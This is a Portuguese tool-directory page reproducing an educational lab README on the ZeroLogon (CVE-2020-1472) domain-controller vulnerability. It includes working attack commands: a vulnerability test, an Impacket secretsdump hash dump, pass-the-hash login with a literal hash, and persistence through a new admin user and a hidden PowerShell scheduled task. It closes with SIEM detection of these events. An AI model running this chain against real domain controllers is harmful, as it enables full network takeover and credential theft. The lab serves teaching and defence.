Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ZeroLogon-CVE-2020-1472-lab — Explicação e demonstração da vulnerabilidade ZeroLogon (CVE-2020-1472) | Kitploit
Ferramentas/GitHubGitHub/100hnomeunome/zerologon-cve-2020-1472-lab
Escalada de PrivilégiosAtaques de SenhaMecanismos de PersistênciaAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoCTFTestes de PenetraçãoAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Labs e Prática
GitHub100hnomeunome/zerologon-cve-2020-1472-lab

ZeroLogon-CVE-2020-1472-lab

Explicação e demonstração da vulnerabilidade ZeroLogon (CVE-2020-1472)

Ver Repositório
3há 11 mesesAinda não revisado

ZeroLogon-CVE-2020-1472

Explicação e demonstração da vulnerabilidade ZeroLogon (CVE-2020-1472)

O objetivo deste laboratório é estritamente educacional. A sua execução não é recomendada em ambientes de produção ou que não lhe pertençam.

Sobre a Vulnerabilidade

Contexto da vulnerabilidade

Esta vulnerabilidade permite que um cyber criminoso assuma o controle de um Controlador de Domínio (DC). Isso é feito alterando ou removendo a senha de uma conta de serviço no controlador. O agente malicioso pode simplesmente causar uma negação de serviço ou assumir o controle e possuir toda a rede. Em agosto de 2020, a Microsoft lançou um patch.

  • Severidade: 10.0 (Crítica) (CVSS v3.1)

Componente afetado: Microsoft Netlogon Remote Protocol (MS-NRPC)

Versões do Windows afetas:

  • Windows Server 2008 R2
  • 2012 / 2012 R2
  • 2016
  • 2019
  • Versões anteriores ao patch de agosto/setembro de 2020

Requerimentos

Clonar os repositorios

  • Impacket
  • zerologon-CVE-2020-1472
  • CVE-2020-1472 - Teste se o servidor alvo está vulneravel

Se for executar localmente!

  • Download do Kali Linux
  • Downald do Windows Server 2008 R2 vulneravel
  • Virtualbox

Na AWS tambem é possivel com essas imagens (cuidado com o billing)

  • Windows Vulneravel - AMI da comunidade921877552404/win2016-dvwa-printnightmare-final-2022-07-04
  • Kali Linux - AMI do Matketplace

Extra: Uma conta no Wazuh para análise dos eventos do SIEM.

  • Wazuh Cloud com trial de 14 dias

Como explorar

Dica: No Kali Linux, o serviço SSH vem desativado por padrão — é necessário iniciá-lo manualmente.

Antes de testar se o servidor está vulnerável, podemos utilizar o nmap para ver quais portas estao abertas:

root@kitploit:~
nmap -sS -T4 -F --open -n ip
Captura de Tela 2025-10-10 às 09 34 13

Usando o CVE-2020-1472 - Teste se o servidor alvo está vulneravel. Execute o comando:

root@kitploit:~
zerologon_tester.py <dc-name> <dc-ip>
Captura de Tela 2025-10-04 às 20 14 40

A ferramenta secretdump é uma tooltik do Impacket

root@kitploit:~
python3 secretsdump.py -just-dc wayne/w2008\[email protected]
Captura de Tela 2025-10-04 às 20 23 53
root@kitploit:~
python3 wmiexec.py wayne/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:088386eb6982d0c2f8960c26b1ff9e6c
Captura de Tela 2025-10-04 às 20 27 05

Se tudo ocorrer bem, conseguiremos fazer o login com o hash What is a pass-the-hash attack?

Captura de Tela 2025-10-04 às 20 30 39

Agora só criar uma persistência! Pode ser um novo usuário!

root@kitploit:~
net user coringa Batman2025 /add
Captura de Tela 2025-10-04 às 20 36 09

Feito! O usuário foi criado com sucesso!

Captura de Tela 2025-10-04 às 20 38 04

Também é possivel criar uma tarefa!

root@kitploit:~
mkdir C:\Temp
root@kitploit:~
schtasks /Create /TN "CriarBackupPS1" /TR "powershell -NoProfile -WindowStyle Hidden -Command \"New-Item -Path 'C:\Temp\backup.ps1' -ItemType File -Force -Value '# backup script'\"" /SC ONLOGON /RL HIGHEST /F
Captura de Tela 2025-10-10 às 10 17 17 Captura de Tela 2025-10-10 às 10 20 33

Eventos no SIEM

É possivel ver a criaçao do usuários e os eventos relacionados ao pass-the-hash e criação de usúarios!

2025-10-06_10-08-10 2025-10-06_10-09-06

Referências

  • Zerologon (CVE-2020-1472): An Unauthenticated Privilege Escalation to Full Domain Privilege
  • O que é Zerologon?
  • [MS-NRPC]: Netlogon Remote Protocol
  • CVE-2020-1472 Detail
  • ZeroLogon-CVE-2020-1472 - Lab no Youtube
  • Pass-the-Hash Attack
  • Mais sobre o Impacket
Baixar ferramenta